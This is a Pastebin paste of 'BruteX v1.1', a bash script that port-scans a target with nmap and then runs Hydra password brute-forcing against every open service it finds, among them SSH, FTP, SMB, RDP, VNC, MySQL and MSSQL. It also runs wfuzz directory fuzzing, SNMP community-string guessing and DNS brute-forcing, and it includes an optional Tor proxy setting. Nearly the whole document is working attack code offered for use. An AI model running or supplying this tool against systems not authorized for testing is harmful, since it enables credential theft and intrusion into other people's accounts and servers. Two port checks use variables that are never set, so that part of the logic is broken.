API tools faq
paste
Advertisement
Guest User

BruteX

a guest
Jul 30th, 2015
270
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.98 KB | None | 0 0
raw download clone embed print report
  1. #!/bin/bash
  2. # BruteX v1.1 by 1N3
  3. # http://crowdshield.com
  4. #
  5. # ABOUT:
  6. # BruteX is a simple bash script used to brute force all services on a target.
  7. #
  8. # USAGE:
  9. # ./brutex <IP/hostname>
  10. #
  11. # DEPENDENCIES:
  12. # 1. NMap
  13. # 2. Hydra
  14. # 3. Wfuzz
  15. # 4. SNMPWalk
  16. # 5. DNSDict
  17. #
  18. # HYDRA SERVICES:
  19. # asterisk cisco cisco-enable cvs ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql(v4) nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey teamspeak telnet[s] vmauthd vnc xmpp
  20. TARGET="$1"
  21. LOOT_DIR=$PWD
  22. USER_FILE="simple-users.txt"
  23. PASS_FILE="password.lst"
  24. DNS_FILE="namelist.txt"
  25. DIRBUST_FILE="dirbuster.txt"
  26. EXT_FILE="dirbuster-ext.txt"
  27. THREADS="30"
  28. COLOR1='\033[91m'
  29. COLOR2='\033[92m'
  30. COLOR3='\033[92m'
  31. RESET='\e[0m'
  32. # UN-COMMENT TO ENABLE PROXY
  33. #export HYDRA_PROXY=socks4://127.0.0.1:9050
  34. if [ -z $TARGET ]; then
  35. echo -e "$COLOR1 __________ __ ____ ___$RESET"
  36. echo -e "$COLOR1 \______ \_______ __ ___/ |_ ____ \ \/ /$RESET"
  37. echo -e "$COLOR1 | | _/\_ __ \ | \ __\/ __ \ \ / $RESET"
  38. echo -e "$COLOR1 | | \ | | \/ | /| | \ ___/ / \ $RESET"
  39. echo -e "$COLOR1 |______ / |__| |____/ |__| \___ >___/\ \ $RESET"
  40. echo -e "$COLOR1 \/ \/ \_/$RESET"
  41. echo ""
  42. echo -e "$COLOR1 + -- --=[BruteX v1.1 by 1N3$RESET"
  43. echo -e "$COLOR1 + -- --=[http://crowdshield.com$RESET"
  44. echo -e "$COLOR1 + -- --=[Usage: brutex <target IP/hostname>"
  45. echo ""
  46. exit
  47. fi
  48. clear
  49. echo -e "$COLOR1 __________ __ ____ ___$RESET"
  50. echo -e "$COLOR1 \______ \_______ __ ___/ |_ ____ \ \/ /$RESET"
  51. echo -e "$COLOR1 | | _/\_ __ \ | \ __\/ __ \ \ / $RESET"
  52. echo -e "$COLOR1 | | \ | | \/ | /| | \ ___/ / \ $RESET"
  53. echo -e "$COLOR1 |______ / |__| |____/ |__| \___ >___/\ \ $RESET"
  54. echo -e "$COLOR1 \/ \/ \_/$RESET"
  55. echo ""
  56. echo -e "$COLOR1 + -- --=[BruteX v1.1 by 1N3$RESET"
  57. echo -e "$COLOR1 + -- --=[http://crowdshield.com$RESET"
  58. echo ""
  59. echo ""
  60. echo -e "$COLOR3################################### Running Port Scan ##############################$RESET"
  61. nmap -T4 --open $TARGET -oX $LOOT_DIR/nmap/$TARGET.xml
  62. echo ""
  63. echo -e "$COLOR3################################### Running Brute Force ############################$RESET"
  64. port_21=`grep 'portid="21"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  65. port_22=`grep 'portid="22"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  66. port_23=`grep 'portid="23"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  67. port_25=`grep 'portid="25"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  68. port_80=`grep 'portid="80"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  69. port_110=`grep 'portid="110"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  70. port_111=`grep 'portid="111"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  71. port_135=`grep 'portid="135"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  72. port_139=`grep 'portid="139"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  73. port_162=`grep 'portid="162"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  74. port_443=`grep 'portid="443"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  75. port_445=`grep 'portid="445"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  76. port_993=`grep 'portid="993"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  77. port_1433=`grep 'portid="1433"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  78. port_3389=`grep 'portid="3389"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  79. port_5432=`grep 'portid="5432"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  80. port_5900=`grep 'portid="5900"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  81. port_5901=`grep 'portid="5901"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  82. port_8000=`grep 'portid="8000"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  83. port_8080=`grep 'portid="8080"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  84. port_6667=`grep 'portid="6667"' $LOOT_DIR/nmap/$TARGET.xml | grep open`
  85. if [ -z "$port_21" ]
  86. then
  87. echo -e "$COLOR1 + -- --=[Port 21 closed... skipping.$RESET"
  88. else
  89. echo -e "$COLOR2 + -- --=[Port 21 opened... running tests...$RESET"
  90. hydra -L $USER_FILE -P $PASS_FILE $TARGET ftp -t $THREADS -e ns
  91. fi
  92. if [ -z "$port_22" ]
  93. then
  94. echo -e "$COLOR1 + -- --=[Port 22 closed... skipping.$RESET"
  95. else
  96. echo -e "$COLOR2 + -- --=[Port 22 opened... running tests...$RESET"
  97. hydra -L $USER_FILE -P $PASS_FILE $TARGET ssh -t $THREADS -e ns
  98. fi
  99. if [ -z "$port_23" ]
  100. then
  101. echo -e "$COLOR1 + -- --=[Port 23 closed... skipping.$RESET"
  102. else
  103. echo -e "$COLOR2 + -- --=[Port 23 opened... running tests...$RESET"
  104. hydra -L $USER_FILE -P $PASS_FILE $TARGET telnet -t $THREADS -e ns
  105. fi
  106. if [ -z "$port_25" ]
  107. then
  108. echo -e "$COLOR1 + -- --=[Port 25 closed... skipping.$RESET"
  109. else
  110. echo -e "$COLOR2 + -- --=[Port 25 opened... running tests...$RESET"
  111. hydra -L $USER_FILE -P $PASS_FILE $TARGET smtp-enum -t $THREADS -e ns
  112. hydra -L $USER_FILE -P $PASS_FILE $TARGET smtp -t $THREADS -e ns
  113. fi
  114. if [ -z "$port_80" ]
  115. then
  116. echo -e "$COLOR1 + -- --=[Port 80 closed... skipping.$RESET"
  117. else
  118. echo -e "$COLOR2 + -- --=[Port 80 opened... running tests...$RESET"
  119. hydra -L $USER_FILE -P $PASS_FILE $TARGET http-head -t $THREADS -e ns -m /
  120. wfuzz -z file,$DIRBUST_FILE --hc 404,403,400,301,401 -c -t $THREADS http://$TARGET/FUZZ/
  121. wfuzz -z file,$DIRBUST_FILE -z file,$EXT_FILE --hc 404,403,400,301,401 -c -t $THREADS http://$TARGET/FUZZ.FUZ2Z
  122. fi
  123. if [ -z "$port_110" ]
  124. then
  125. echo -e "$COLOR1 + -- --=[Port 110 closed... skipping.$RESET"
  126. else
  127. echo -e "$COLOR2 + -- --=[Port 110 opened... running tests...$RESET"
  128. hydra -L $USER_FILE -P $PASS_FILE $TARGET pop3 -t $THREADS -e ns
  129. fi
  130. if [ -z "$port_139" ]
  131. then
  132. echo -e "$COLOR1 + -- --=[Port 139 closed... skipping.$RESET"
  133. else
  134. echo -e "$COLOR2 + -- --=[Port 139 opened... running tests...$RESET"
  135. hydra -L $USER_FILE -P $PASS_FILE $TARGET smb -S 139 -t $THREADS -e ns
  136. fi
  137. if [ -z "$port_162" ]
  138. then
  139. echo -e "$COLOR1 + -- --=[Port 162 closed... skipping.$RESET"
  140. else
  141. echo -e "$COLOR2 + -- --=[Port 162 opened... running tests...$RESET"
  142. for a in `cat /pentest/lists/wordlist-common-snmp-community-strings.txt`; do snmpwalk $TARGET -c $a; done;
  143. fi
  144. if [ -z "$port_443" ]
  145. then
  146. echo -e "$COLOR1 + -- --=[Port 443 closed... skipping.$RESET"
  147. else
  148. echo -e "$COLOR2 + -- --=[Port 443 opened... running tests...$RESET"
  149. hydra -L $USER_FILE -P $PASS_FILE $TARGET http-head -t $THREADS -e ns -m /
  150. wfuzz -z file,$DIRBUST_FILE --hc 404,403,400,301,401 -c -t $THREADS https://$TARGET/FUZZ/
  151. wfuzz -z file,$DIRBUST_FILE -z file,$EXT_FILE --hc 404,403,400,301,401 -c -t $THREADS https://$TARGET/FUZZ.FUZ2Z
  152. fi
  153. if [ -z "$port_445" ]
  154. then
  155. echo -e "$COLOR1 + -- --=[Port 445 closed... skipping.$RESET"
  156. else
  157. echo -e "$COLOR2 + -- --=[Port 445 opened... running tests...$RESET"
  158. hydra -L $USER_FILE -P $PASS_FILE $TARGET smb -S 445 -t $THREADS -e ns
  159. fi
  160. if [ -z "$port_993" ]
  161. then
  162. echo -e "$COLOR1 + -- --=[Port 993 closed... skipping.$RESET"
  163. else
  164. echo -e "$COLOR2 + -- --=[Port 993 opened... running tests...$RESET"
  165. hydra -L $USER_FILE -P $PASS_FILE $TARGET imap -S 993 -t $THREADS -e ns
  166. fi
  167. if [ -z "$port_1433" ]
  168. then
  169. echo -e "$COLOR1 + -- --=[Port 1433 closed... skipping.$RESET"
  170. else
  171. echo -e "$COLOR2 + -- --=[Port 1433 opened... running tests...$RESET"
  172. hydra -L $USER_FILE -P $PASS_FILE $TARGET mssql -S 1433 -t $THREADS -e ns
  173. fi
  174. if [ -z "$port_3306" ]
  175. then
  176. echo -e "$COLOR1 + -- --=[Port 3306 closed... skipping.$RESET"
  177. else
  178. echo -e "$COLOR2 + -- --=[Port 3306 opened... running tests...$RESET"
  179. hydra -L $USER_FILE -P $PASS_FILE $TARGET mysql -t $THREADS -e ns
  180. fi
  181. if [ -z "$port_3389" ]
  182. then
  183. echo -e "$COLOR1 + -- --=[Port 3389 closed... skipping.$RESET"
  184. else
  185. echo -e "$COLOR2 + -- --=[Port 3389 opened... running tests...$RESET"
  186. hydra -L $USER_FILE -P $PASS_FILE $TARGET rdp -t $THREADS -e ns
  187. fi
  188. if [ -z "$port_5900" ]
  189. then
  190. echo -e "$COLOR1 + -- --=[Port 5900 closed... skipping.$RESET"
  191. else
  192. echo -e "$COLOR2 + -- --=[Port 5900 opened... running tests...$RESET"
  193. hydra -L $USER_FILE -P $PASS_FILE $TARGET vnc -t $THREADS -e ns
  194. fi
  195. if [ -z "$port_5901" ]
  196. then
  197. echo -e "$COLOR1 + -- --=[Port 5901 closed... skipping.$RESET"
  198. else
  199. echo -e "$COLOR2 + -- --=[Port 5901 opened... running tests...$RESET"
  200. hydra -L $USER_FILE -P $PASS_FILE $TARGET vnc -S 5901 -t $THREADS -e ns
  201. fi
  202. if [ -z "$port_8000" ]
  203. then
  204. echo -e "$COLOR1 + -- --=[Port 8000 closed... skipping.$RESET"
  205. else
  206. echo -e "$COLOR2 + -- --=[Port 8000 opened... running tests...$RESET"
  207. hydra -L $USER_FILE -P $PASS_FILE $TARGET http-head -s 8000 -t $THREADS -e ns -m /
  208. wfuzz -z file,$DIRBUST_FILE --hc 404,403,400,301,401 -c -t $THREADS http://$TARGET:8000/FUZZ/
  209. wfuzz -z file,$DIRBUST_FILE -z file,$EXT_FILE --hc 404,403,400,301,401 -c -t $THREADS http://$TARGET:8000/FUZZ.FUZ2Z
  210. fi
  211. if [ -z "$port_8100" ]
  212. then
  213. echo -e "$COLOR1 + -- --=[Port 8100 closed... skipping.$RESET"
  214. else
  215. echo -e "$COLOR2 + -- --=[Port 8100 opened... running tests...$RESET"
  216. hydra -L $USER_FILE -P $PASS_FILE $TARGET http-head -s 8100 -t $THREADS -e ns -m /
  217. wfuzz -z file,$DIRBUST_FILE --hc 404,403,400,301,401 -c -t $THREADS http://$TARGET:8100/FUZZ/
  218. wfuzz -z file,$DIRBUST_FILE -z file,$EXT_FILE --hc 404,403,400,301,401 -c -t $THREADS http://$TARGET:8100/FUZZ.FUZ2Z
  219. fi
  220. if [ -z "$port_8080" ]
  221. then
  222. echo -e "$COLOR1 + -- --=[Port 8080 closed... skipping.$RESET"
  223. else
  224. echo -e "$COLOR2 + -- --=[Port 8080 opened... running tests...$RESET"
  225. hydra -L $USER_FILE -P $PASS_FILE $TARGET http-head -s 8080 -t $THREADS -e ns -m /
  226. hydra -L $USER_FILE -P $PASS_FILE $TARGET http-proxy -s 8080 -t $THREADS -e ns
  227. wfuzz -z file,$DIRBUST_FILE --hc 404,403,400,301,401 -c -t $THREADS http://$TARGET:8080/FUZZ/
  228. wfuzz -z file,$DIRBUST_FILE -z file,$EXT_FILE --hc 404,403,400,301,401 -c -t $THREADS http://$TARGET:8080/FUZZ.FUZ2Z
  229. fi
  230. if [ -z "$port_6667" ]
  231. then
  232. echo -e "$COLOR1 + -- --=[Port 6667 closed... skipping.$RESET"
  233. else
  234. echo -e "$COLOR2 + -- --=[Port 6667 opened... running tests...$RESET"
  235. hydra -L $USER_FILE -P $PASS_FILE $TARGET irc -s 6667 -t $THREADS -e ns
  236. fi
  237. echo ""
  238. echo -e "$COLOR3################################### Brute Forcing DNS ###############################$RESET"
  239. dnsdict6 $TARGET $DNS_FILE -4
  240. echo ""
  241. echo -e "$COLOR3################################### Done! ###########################################$RESET"
  242. exit 0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!